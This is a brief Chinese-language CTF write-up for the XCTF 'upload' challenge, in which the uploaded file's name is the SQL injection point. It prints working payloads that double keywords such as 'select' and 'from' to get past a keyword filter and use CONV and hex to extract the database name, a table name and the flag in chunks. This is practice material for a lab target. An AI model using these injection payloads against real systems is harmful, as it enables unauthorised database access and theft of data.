XCTF-upload

这道题的话，看了一下是RCTF-2015的原题。。。。但是这也太难了吧QAQ，文件名做为注入点可也是太秀了，害的我一直觉得是文件上传QAQ,而且这道题的坑还很多，就是注入时的输出只能为10进制。。。。。这也就是说还须要你进行一下进制转换。。。

 

 

还有这里面将select和from过滤了一次。。。你还须要双写，，，哎。心累

 

一遍遍的fuzz的话，不知道要弄到何时。幸好我是看着题解作的2333:)

 

不说了，由于本身啥也不会(看的题解QAQ)，因此直接将payload发一下(其实不难，主要是你可以发现问题)

 

 

爆数据库名:     '+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg 

将filename里面的内容替换掉，而后发送，刷新一下页面，就会有回显了。

  　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

 

 

先把10进制变为16进制在转为字符串，还有由于回显位数有限，因此你还须要多切割几回QAQ

 

爆表名：'+(selselectect  CONV(substr(hex(selselectect table_name  frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),1,10),16,10))+'.jpg

 

爆列名：把上面的改一下就好了

 

爆flag：'+(selselectect+CONV(substr(hex((selselectect i_am_flag  frfromom hello_flag_is_here  )),25,12),16,10))+'.jpg

 

 

 

本身仍是太菜了